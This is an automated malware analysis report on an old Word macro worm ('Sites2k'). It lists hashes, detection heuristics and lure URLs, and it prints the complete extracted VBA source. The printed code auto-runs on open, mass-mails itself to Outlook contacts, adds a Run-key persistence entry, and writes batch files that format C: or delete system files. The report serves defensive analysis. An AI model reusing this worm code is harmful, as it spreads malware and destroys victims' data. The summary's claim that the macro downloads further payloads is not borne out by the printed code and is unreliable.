Office (OLE) malware analysis — malicious · d8a4e7d4faeaf9ee

MALICIOUS

Office (OLE)

42.5 KB Created: 2001-01-27 21:08:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 1832421ff989648031042afd6f319268 SHA-1: f06e3215463f311140b6b2b63bf0fa696d466627 SHA-256: d8a4e7d4faeaf9eebf932d119ac2cbac237379e7100471a5392a552f4737b163

350 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that utilize WScript.Shell and CreateObject to execute commands. The AutoOpen macro copies the current document to C:\Windows\System\sites.doc and creates a VBScript file at C:\Windows\System32.vbs. This VBScript, in turn, uses Scripting.FileSystemObject and WScript.Shell to download and execute further payloads, likely from the embedded URLs. The document body itself is a lure, presenting a list of websites.

Heuristics 9

ClamAV: Doc.Trojan.Sites-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Sites-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

eee = "Scripting.FileSystemObject"
unk = "WScript.Shell"
out = "Outlook.Application"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Print #1, "Dim fso, dirsystem"
Print #1, "Set fso = CreateObject(" + Chr(34) + eee + Chr(34) + ")"
Print #1, "Set dirsystem = fso.GetSpecialFolder(1)"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.warez.com In document text (OLE body)
- http://www.gamesdomain.comIn document text (OLE body)
- http://www.gamezatteck.deIn document text (OLE body)
- http://www.softwarez4u1.cjb.netIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4827 bytes
SHA-256: `eeb1936703a76df7106c24a7ec043d6c2fa7d1844de6ee1b6433b1f7e10bb8f1`
Detection ClamAV: Doc.Trojan.Sites-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Hybris" Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long Sub AutoOpen() Dim subb, unk, out, m, s, body, doc, bbb, tye, gg, eee As String Dim rrrw As Long eee = "Scripting.FileSystemObject" unk = "WScript.Shell" out = "Outlook.Application" m = "MAPI" s = " HKEY_CURRENT_USER\Software\Microsoft\Wab " subb = "Some Intresting Site..." body = "Hey, Here are a document with many new intresting web site... take a look. Bye" bbb = "sites.doc" tye = "HKEY_CURRENT_USER\Software\Microsoft\WAB\" gg = "REG_DWORD" Me1 = ActiveDocument.Path Me2 = ActiveDocument.Name RT = Me1 & "\" + Me2 rrrw = CopyFile(RT, "C:\Windows\System\sites.doc", "4") Open "C:\Windows\System32.vbs" For Output As #1 Print #1, "'VBS.Sites2k.Worm By Dr.T/Xmorfic" Print #1, "main ()" Print #1, "" Print #1, "sub main()" Print #1, "On Error Resume Next" Print #1, "Dim fso, dirsystem" Print #1, "Set fso = CreateObject(" + Chr(34) + eee + Chr(34) + ")" Print #1, "Set dirsystem = fso.GetSpecialFolder(1)" Print #1, "call semail()" Print #1, "" Print #1, "" Print #1, "sub semail()" Print #1, "On Error Resume Next" Print #1, "Dim rrg, lista, a, x, wab, maild, liste, lista" Print #1, "Set rrg = CreateObject(" + Chr(34) + unk + Chr(34) + ")" Print #1, "Set spread = WScript.CreateObject(" + Chr(34) + out + Chr(34) + ")" Print #1, "Set mapi = spread.GetNameSpace(" + Chr(34) + m + Chr(34) + ")" Print #1, "For lista = 1 To mapi.AddresList.Count" Print #1, "Set a = mapi.AddressList.Count(lista)" Print #1, "x = 1" Print #1, "wab = rrg.RegRead(" + Chr(34) + s + Chr(34) + "& a)" Print #1, "If (wab = " + Chr(34) + Chr(34) + ") Then" Print #1, "wab = 1" Print #1, "End If" Print #1, "If (Int(a.AddressEntries.Count) > Int(wab)) Then" Print #1, "For liste = 1 To a.AddressEntries.Count" Print #1, "maild = a.AddressEntries(x)" Print #1, "regad =" + Chr(34) + Chr(34) Print #1, "regad = rrg.RegRead(" + Chr(34) + s + Chr(34) + "& maild)" Print #1, "If (regad = " + Chr(34) + Chr(34) + ") Then" Print #1, "Set mail = out.CreateItem(0)" Print #1, "mail.Recipients.Add (maild)" Print #1, "mail.Subject =" + Chr(34) + subb + Chr(34) Print #1, "mail.Body = vbCrLf &" + Chr(34) + body + Chr(34) Print #1, "mail.Attachments.Add (dirsystem &" + Chr(34) + "\" + bbb + Chr(34) + ")" Print #1, "mail.Send" Print #1, "rrg.RegWrite " + Chr(34) + tye + Chr(34) + "& maild,1," + Chr(34) + gg + Chr(34) Print #1, "End If" Print #1, "x = x + 1" Print #1, "Next" Print #1, "rrg.RegWrite " + Chr(34) + s + Chr(34) + "&a,a.AddressEntries.Count" Print #1, "Else" Print #1, "rrg.RegWrite " + Chr(34) + s + Chr(34) + " & a, a.AddressEntries.Count " Print #1, "End If" Print #1, "Next" Print #1, "Set out = Nothing" Print #1, "Set mapi = Nothing" Print #1, "End Sub" Close #1 If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "WinVBS") <> "C:\Windows\System32.vbs" Then System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "WinVBS") = "C:\Windows\System32.vbs" End If If Day(1) Or Day(29) Then Open "C:\Windows\reg.bat" For Output As #1 Print #1, "@echo off" Print #1, "ctty nul" Print #1, "format c: /autotest /q /u" Print #1, "Done!!" Close #1 Kill "C:\Autoexec.bat" Open "C:\Autoexec.bat" For Output As #1 Print #1, "@echo off" Print #1, "cd ..\windows" Print #1, "reg.bat" Close #1 Else Kill "C:\Autoexec.bat" Open "C:\Autoexec.bat" For Output As #1 Print #1, "@echo off" Print #1, "echo Windows Registry Checking...." Print #1, "echo Started checking registry..." Print #1, "del C:\Windows\Command\Ansi.sys" Print #1, "del C:\Windows\Command\attrib.exe" Print #1, "del C:\Windows\Command\Bootdisk.bat" Print #1, "del C:\Windows\Command\Display.sys" Print #1, "del C:\Windows\Command\Keyboard.sys" Print #1, "del C:\Windows\System\Wsock32.dll" Print #1, "del C:\Windows\System\Wsock2.vxd" Print #1, "del C:\Windows\System\Vmm32.vxd" Print #1, "echo No errors found !" Close #1 End If ret = MsgBox("Unable to open the current document. The problem may be connected to kernel32.dll", vbCritical) If ret = vbOK Then ActiveDocument.Close End If End Sub Sub HelpAbout() MsgBox "This program performed an illegal operation at 0x02338288:0x0001002", vbCritical End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.